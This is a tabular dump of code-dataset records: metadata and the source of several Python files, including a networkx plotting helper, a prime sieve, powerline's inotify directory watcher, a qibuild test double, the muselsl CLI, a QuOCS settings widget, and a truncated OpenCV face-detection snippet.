hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
608c22777b56d9cf666ec3250a4f4ccb1c127d26
| 848
|
py
|
Python
|
mcmc/plot_graph.py
|
hudalao/mcmc
|
148d9fbb9ebd85ee5bfd3601d80ebbd96bc25791
|
[
"MIT"
] | null | null | null |
mcmc/plot_graph.py
|
hudalao/mcmc
|
148d9fbb9ebd85ee5bfd3601d80ebbd96bc25791
|
[
"MIT"
] | null | null | null |
mcmc/plot_graph.py
|
hudalao/mcmc
|
148d9fbb9ebd85ee5bfd3601d80ebbd96bc25791
|
[
"MIT"
] | null | null | null |
# commend the lines for plotting using
import matplotlib.pyplot as plt
import networkx as nx
def plot_graph(G, N, time_point, posi):
#setting up for graph plotting
#setting the positions for all nodes
pos = {}
for ii in range(N):
pos[ii] = posi[ii]
# plt.figure(time_point + 1)
elarge=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] >0.5]
esmall=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] <=0.5]
# nodes
# nx.draw_networkx_nodes(G[time_point],pos,node_size=200)
# edges
# nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3)
# nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed')
# labels
# nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif')
| 33.92
| 110
| 0.681604
| 148
| 848
| 3.763514
| 0.425676
| 0.129264
| 0.10772
| 0.093357
| 0.301616
| 0.301616
| 0.301616
| 0.301616
| 0.301616
| 0.157989
| 0
| 0.019774
| 0.165094
| 848
| 24
| 111
| 35.333333
| 0.766949
| 0.554245
| 0
| 0
| 0
| 0
| 0.032877
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
608d2fef138f592a57bb71b64db9742a86c572f7
| 293
|
py
|
Python
|
Number Theory/Sieve_of_Eratosthenes.py
|
mishrakeshav/Competitive-Programming
|
b25dcfeec0fb9a9c71bf3a05644b619f4ca83dd2
|
[
"MIT"
] | 2
|
2020-06-25T21:10:32.000Z
|
2020-12-10T06:53:45.000Z
|
Number Theory/Sieve_of_Eratosthenes.py
|
mishrakeshav/Competitive-Programming
|
b25dcfeec0fb9a9c71bf3a05644b619f4ca83dd2
|
[
"MIT"
] | null | null | null |
Number Theory/Sieve_of_Eratosthenes.py
|
mishrakeshav/Competitive-Programming
|
b25dcfeec0fb9a9c71bf3a05644b619f4ca83dd2
|
[
"MIT"
] | 3
|
2020-05-15T14:17:09.000Z
|
2021-07-25T13:18:20.000Z
|
from sys import stdin
input = stdin.readline
N = int(input())
primes = [1]*(N+1)
primes[0] = 0
primes[1] = 0
for i in range(2,int(N**0.5)+1):
if primes[i]:
for j in range(i*i,N+1,i):
primes[j] = 0
for i in range(N+1):
if primes[i]:
print(i,end = " ")
| 19.533333
| 34
| 0.522184
| 57
| 293
| 2.684211
| 0.368421
| 0.039216
| 0.065359
| 0.091503
| 0.156863
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062201
| 0.286689
| 293
| 14
| 35
| 20.928571
| 0.669856
| 0
| 0
| 0.153846
| 0
| 0
| 0.003413
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
608e2946d7df6fc1e0129b19ce4192449ba804b9
| 6,118
|
py
|
Python
|
powerline/lib/tree_watcher.py
|
kruton/powerline
|
f6ddb95da5f41b8285cffd1d17c1ef46dc08a7d6
|
[
"MIT"
] | 19
|
2015-09-01T20:49:16.000Z
|
2022-01-08T22:13:23.000Z
|
powerline/lib/tree_watcher.py
|
kruton/powerline
|
f6ddb95da5f41b8285cffd1d17c1ef46dc08a7d6
|
[
"MIT"
] | null | null | null |
powerline/lib/tree_watcher.py
|
kruton/powerline
|
f6ddb95da5f41b8285cffd1d17c1ef46dc08a7d6
|
[
"MIT"
] | 6
|
2019-04-25T03:42:35.000Z
|
2020-06-05T15:25:23.000Z
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, absolute_import, print_function)
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import sys
import os
import errno
from time import sleep
from powerline.lib.monotonic import monotonic
from powerline.lib.inotify import INotify, INotifyError
class NoSuchDir(ValueError):
pass
class BaseDirChanged(ValueError):
pass
class DirTooLarge(ValueError):
def __init__(self, bdir):
ValueError.__init__(self, 'The directory {0} is too large to monitor. Try increasing the value in /proc/sys/fs/inotify/max_user_watches'.format(bdir))
def realpath(path):
return os.path.abspath(os.path.realpath(path))
class INotifyTreeWatcher(INotify):
is_dummy = False
def __init__(self, basedir, ignore_event=None):
super(INotifyTreeWatcher, self).__init__()
self.basedir = realpath(basedir)
self.watch_tree()
self.modified = True
self.ignore_event = (lambda path, name: False) if ignore_event is None else ignore_event
def watch_tree(self):
self.watched_dirs = {}
self.watched_rmap = {}
try:
self.add_watches(self.basedir)
except OSError as e:
if e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
def add_watches(self, base, top_level=True):
''' Add watches for this directory and all its descendant directories,
recursively. '''
base = realpath(base)
# There may exist a link which leads to an endless
# add_watches loop or to maximum recursion depth exceeded
if not top_level and base in self.watched_dirs:
return
try:
is_dir = self.add_watch(base)
except OSError as e:
if e.errno == errno.ENOENT:
# The entry could have been deleted between listdir() and
# add_watch().
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
if e.errno == errno.EACCES:
# We silently ignore entries for which we dont have permission,
# unless they are the top level dir
if top_level:
raise NoSuchDir('You do not have permission to monitor {0}'.format(base))
return
raise
else:
if is_dir:
try:
files = os.listdir(base)
except OSError as e:
if e.errno in (errno.ENOTDIR, errno.ENOENT):
# The dir was deleted/replaced between the add_watch()
# and listdir()
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
raise
for x in files:
self.add_watches(os.path.join(base, x), top_level=False)
elif top_level:
# The top level dir is a file, not good.
raise NoSuchDir('The dir {0} does not exist'.format(base))
def add_watch(self, path):
import ctypes
bpath = path if isinstance(path, bytes) else path.encode(self.fenc)
wd = self._add_watch(self._inotify_fd, ctypes.c_char_p(bpath),
# Ignore symlinks and watch only directories
self.DONT_FOLLOW | self.ONLYDIR |
self.MODIFY | self.CREATE | self.DELETE |
self.MOVE_SELF | self.MOVED_FROM | self.MOVED_TO |
self.ATTRIB | self.DELETE_SELF)
if wd == -1:
eno = ctypes.get_errno()
if eno == errno.ENOTDIR:
return False
raise OSError(eno, 'Failed to add watch for: {0}: {1}'.format(path, self.os.strerror(eno)))
self.watched_dirs[path] = wd
self.watched_rmap[wd] = path
return True
def process_event(self, wd, mask, cookie, name):
if wd == -1 and (mask & self.Q_OVERFLOW):
# We missed some INOTIFY events, so we dont
# know the state of any tracked dirs.
self.watch_tree()
self.modified = True
return
path = self.watched_rmap.get(wd, None)
if path is not None:
self.modified = not self.ignore_event(path, name)
if mask & self.CREATE:
# A new sub-directory might have been created, monitor it.
try:
self.add_watch(os.path.join(path, name))
except OSError as e:
if e.errno == errno.ENOENT:
# Deleted before add_watch()
pass
elif e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
else:
raise
if (mask & self.DELETE_SELF or mask & self.MOVE_SELF) and path == self.basedir:
raise BaseDirChanged('The directory %s was moved/deleted' % path)
def __call__(self):
self.read()
ret = self.modified
self.modified = False
return ret
class DummyTreeWatcher(object):
is_dummy = True
def __init__(self, basedir):
self.basedir = realpath(basedir)
def __call__(self):
return False
class TreeWatcher(object):
def __init__(self, expire_time=10):
self.watches = {}
self.last_query_times = {}
self.expire_time = expire_time * 60
def watch(self, path, logger=None, ignore_event=None):
path = realpath(path)
try:
w = INotifyTreeWatcher(path, ignore_event=ignore_event)
except (INotifyError, DirTooLarge) as e:
if logger is not None and not isinstance(e, INotifyError):
logger.warn('Failed to watch path: {0} with error: {1}'.format(path, e))
w = DummyTreeWatcher(path)
self.watches[path] = w
return w
def is_actually_watched(self, path):
w = self.watches.get(path, None)
return not getattr(w, 'is_dummy', True)
def expire_old_queries(self):
pop = []
now = monotonic()
for path, lt in self.last_query_times.items():
if now - lt > self.expire_time:
pop.append(path)
for path in pop:
del self.last_query_times[path]
def __call__(self, path, logger=None, ignore_event=None):
path = realpath(path)
self.expire_old_queries()
self.last_query_times[path] = monotonic()
w = self.watches.get(path, None)
if w is None:
try:
self.watch(path, logger=logger, ignore_event=ignore_event)
except NoSuchDir:
pass
return True
try:
return w()
except BaseDirChanged:
self.watches.pop(path, None)
return True
except DirTooLarge as e:
if logger is not None:
logger.warn(str(e))
self.watches[path] = DummyTreeWatcher(path)
return False
if __name__ == '__main__':
w = INotifyTreeWatcher(sys.argv[-1])
w()
print ('Monitoring', sys.argv[-1], 'press Ctrl-C to stop')
try:
while True:
if w():
print (sys.argv[-1], 'changed')
sleep(1)
except KeyboardInterrupt:
raise SystemExit(0)
| 27.936073
| 152
| 0.698431
| 897
| 6,118
| 4.610925
| 0.259755
| 0.029255
| 0.007253
| 0.015474
| 0.183027
| 0.153046
| 0.127901
| 0.127901
| 0.079545
| 0.062621
| 0
| 0.005078
| 0.195325
| 6,118
| 218
| 153
| 28.06422
| 0.83506
| 0.112782
| 0
| 0.319527
| 0
| 0.005917
| 0.083256
| 0.006846
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088757
| false
| 0.023669
| 0.047337
| 0.011834
| 0.278107
| 0.017751
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60903b5f4352258ad0e0ec223250ecb5c743a43e
| 3,642
|
py
|
Python
|
python/qisys/test/fake_interact.py
|
PrashantKumar-sudo/qibuild
|
a16ce425cf25127ceff29507feeeeca37af23351
|
[
"BSD-3-Clause"
] | null | null | null |
python/qisys/test/fake_interact.py
|
PrashantKumar-sudo/qibuild
|
a16ce425cf25127ceff29507feeeeca37af23351
|
[
"BSD-3-Clause"
] | null | null | null |
python/qisys/test/fake_interact.py
|
PrashantKumar-sudo/qibuild
|
a16ce425cf25127ceff29507feeeeca37af23351
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Fake Interact """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
class FakeInteract(object):
""" A class to tests code depending on qisys.interact """
def __init__(self):
""" FakeInteract Init """
self.answers_type = None
self.answer_index = -1
self._answers = None
self.questions = list()
self.editor = None
@property
def answers(self):
""" Answers Getter """
if self._answers is None:
raise Exception("FakeInteract not initialized")
return self._answers
@answers.setter
def answers(self, value):
""" Answers Setter """
if isinstance(value, dict):
self.answers_type = "dict"
elif isinstance(value, list):
self.answers_type = "list"
else:
raise Exception("Unknow answer type: " + type(value))
self._answers = value
def find_answer(self, message, choices=None, default=None):
""" Find Answer """
keys = self.answers.keys()
for key in keys:
if key in message.lower():
if not choices:
return self.answers[key]
answer = self.answers[key]
if answer in choices:
return answer
else:
mess = "Would answer %s\n" % answer
mess += "But choices are: %s\n" % choices
raise Exception(mess)
if default is not None:
return default
mess = "Could not find answer for\n :: %s\n" % message
mess += "Known keys are: %s" % ", ".join(keys)
raise Exception(mess)
def ask_choice(self, choices, message, **_unused):
""" Ask Choice """
print("::", message)
for choice in choices:
print("* ", choice)
answer = self._get_answer(message, choices)
print(">", answer)
return answer
def ask_yes_no(self, message, default=False):
""" Ask Yes / No """
print("::", message,)
if default:
print("(Y/n)")
else:
print("(y/N)")
answer = self._get_answer(message, default=default)
print(">", answer)
return answer
def ask_path(self, message):
""" Ask Path """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_string(self, message):
""" Ask String """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_program(self, message):
""" Ask Program """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def get_editor(self):
""" Return the Editor """
return self.editor
def _get_answer(self, message, choices=None, default=None):
""" Get an Answer """
question = dict()
question['message'] = message
question['choices'] = choices
question['default'] = default
self.questions.append(question)
if self.answers_type == "dict":
return self.find_answer(message, choices=choices, default=default)
self.answer_index += 1
return self.answers[self.answer_index]
| 31.396552
| 84
| 0.556013
| 397
| 3,642
| 4.969773
| 0.274559
| 0.072478
| 0.032945
| 0.04815
| 0.195641
| 0.169285
| 0.139888
| 0.100355
| 0.100355
| 0.100355
| 0
| 0.004482
| 0.326194
| 3,642
| 115
| 85
| 31.669565
| 0.799511
| 0.113674
| 0
| 0.270588
| 0
| 0
| 0.064209
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.129412
| false
| 0
| 0.035294
| 0
| 0.317647
| 0.164706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
6090c304e6f8f9a2666ec59c479f530bc3d45c1f
| 7,727
|
py
|
Python
|
muselsl/cli.py
|
kowalej/muse-lsl
|
9086f2588bee3b2858b0ff853b7a08cdcd0e7612
|
[
"BSD-3-Clause"
] | 2
|
2020-12-04T15:01:19.000Z
|
2021-11-20T23:05:38.000Z
|
muselsl/cli.py
|
fahad101/muse-lsl
|
32aced5eb29db8834cbffd8533607e8d32cfa2b7
|
[
"BSD-3-Clause"
] | null | null | null |
muselsl/cli.py
|
fahad101/muse-lsl
|
32aced5eb29db8834cbffd8533607e8d32cfa2b7
|
[
"BSD-3-Clause"
] | 1
|
2020-12-03T21:28:01.000Z
|
2020-12-03T21:28:01.000Z
|
#!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
| 52.209459
| 140
| 0.533325
| 876
| 7,727
| 4.659817
| 0.175799
| 0.046301
| 0.087457
| 0.039686
| 0.693533
| 0.641842
| 0.571044
| 0.534297
| 0.499755
| 0.490691
| 0
| 0.009447
| 0.356154
| 7,727
| 147
| 141
| 52.564626
| 0.811055
| 0.023424
| 0
| 0.480916
| 0
| 0.038168
| 0.421639
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045802
| false
| 0
| 0.053435
| 0
| 0.10687
| 0.015267
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
609290208240ce63b7e6295f7ddcd5f772b8a453
| 2,420
|
py
|
Python
|
src/quocspyside2interface/gui/freegradients/GeneralSettingsNM.py
|
Quantum-OCS/QuOCS-pyside2interface
|
69436666a67da6884aed1ddd087b7062dcd2ad90
|
[
"Apache-2.0"
] | 1
|
2021-03-27T17:41:16.000Z
|
2021-03-27T17:41:16.000Z
|
src/quocspyside2interface/gui/freegradients/GeneralSettingsNM.py
|
Quantum-OCS/QuOCS-pyside2interface
|
69436666a67da6884aed1ddd087b7062dcd2ad90
|
[
"Apache-2.0"
] | null | null | null |
src/quocspyside2interface/gui/freegradients/GeneralSettingsNM.py
|
Quantum-OCS/QuOCS-pyside2interface
|
69436666a67da6884aed1ddd087b7062dcd2ad90
|
[
"Apache-2.0"
] | null | null | null |
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}}
| 48.4
| 110
| 0.704132
| 259
| 2,420
| 6.332046
| 0.440154
| 0.087805
| 0.060976
| 0.058537
| 0.046341
| 0.046341
| 0.046341
| 0
| 0
| 0
| 0
| 0.005413
| 0.160331
| 2,420
| 50
| 111
| 48.4
| 0.801673
| 0.32438
| 0
| 0
| 0
| 0
| 0.048237
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0.041667
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
6096d49f97f28ce9400a93ea2f44d5ab24de77e4
| 2,701
|
py
|
Python
|
faceRecognition.py
|
sequery/Face-Recognition-Project
|
84d29322228e140c3d18c9c4d169819375a8e256
|
[
"MIT"
] | 2
|
2020-12-23T13:39:54.000Z
|
2021-01-11T15:34:29.000Z
|
faceRecognition.py
|
sequery/Face-Recognition-Project
|
84d29322228e140c3d18c9c4d169819375a8e256
|
[
"MIT"
] | null | null | null |
faceRecognition.py
|
sequery/Face-Recognition-Project
|
84d29322228e140c3d18c9c4d169819375a8e256
|
[
"MIT"
] | null | null | null |
import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image below function returns rectangle for face detected alongwith gray scale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
